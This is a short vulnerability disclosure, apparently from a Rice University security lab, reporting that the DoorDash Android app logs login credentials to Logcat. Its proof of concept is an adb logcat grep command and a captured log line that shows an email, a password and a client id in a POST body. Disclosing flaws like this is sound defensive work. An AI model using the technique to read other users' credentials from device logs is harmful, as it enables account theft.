Security Problem in DoorDash Android App

1. # Exploit Title: DoorDash Android App - Username/Password Logging
2. # Application: DoorDash
3. # Version: 11.0.2 ~ 11.5.2 (all versions we tested have this problem)
4. # Software Link: https://play.google.com/store/apps/details?id=com.dd.doordash
5. # Company: DoorDash
6. # Installs: 10,000,000+  (#1 in food category in Google Play)
7. # Impact: Looking at the output of Logcat, hackers can get username and password of DoorDash
8. # Category: Mobile Apps
9. # Tested on: Android 9
10.  
11. ---Description---
12. Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of DoorDash, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
13.  
14. ---Vendor feedback---
15. We have reported this issue, and they will fix it soon.
16.  
17. ---PoC---
18. 1. Try to log in DoorDash Android app, Android app.
19.   - Opening Login UI
20.   - Enter credentials. Fake information is enough for reproducing.
21.  
22. 2. Search password in Logcat
23. $ adb logcat | grep 'OkHttp'
24.  
25. 10-07 16:09:34.498 10066 10201 D OkHttp  : --> POST https://api.doordash.com/v2/auth/token/
26. 10-07 16:09:34.498 10066 10201 D OkHttp  : Content-Type: application/json; charset=UTF-8
27. 10-07 16:09:34.498 10066 10201 D OkHttp  : Content-Length: 109
28. 10-07 16:09:34.498 10066 10201 D OkHttp  : X-NewRelic-ID: XAUEWF5SGwEJUFhUDwcA
29. 10-07 16:09:34.498 10066 10201 D OkHttp  : {"client_id":"6086ebcbfb859ee3","email":"jaeho.lee@rice.edu","is_manual":true,"password":"MyPasswordIsHere!"}
30. 10-07 16:09:34.498 10066 10201 D OkHttp  : --> END POST (109-byte body)
31.  
32.  
33. ---Reporter---
34. Jaeho Lee(Jaeho.Lee@rice.edu)
35. Rice Computer Security Lab
36. Rice University